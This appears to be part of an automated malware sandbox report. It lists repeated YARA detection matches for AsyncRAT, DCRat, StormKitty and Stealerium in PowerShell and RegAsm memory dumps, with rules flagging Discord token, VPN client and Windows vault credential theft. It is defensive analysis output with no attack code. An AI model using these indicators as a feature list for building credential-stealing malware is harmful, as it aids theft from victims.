            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            .NET source code contains very large strings
            Source: 0.2.powershell.exe.219ab9a4e58.4.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 0.2.powershell.exe.219c3ac0000.12.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 0.2.powershell.exe.219acd868f0.1.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 0.2.powershell.exe.219acd986b0.3.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02A62F28 NtProtectVirtualMemory,10_2_02A62F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02A63368 NtProtectVirtualMemory,10_2_02A63368
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02A627A010_2_02A627A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02A62F2810_2_02A62F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02A6279210_2_02A62792
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02A62F1910_2_02A62F19
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0691746010_2_06917460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0691000610_2_06910006
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0691004010_2_06910040
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: dump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.219ace53b18.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219ace4d6e0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219ab9e88f8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219acd82cf6.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219ab9a4e58.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219acd986b0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219ab9a19ce.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.219acd82cf6.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219ab9a19ce.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
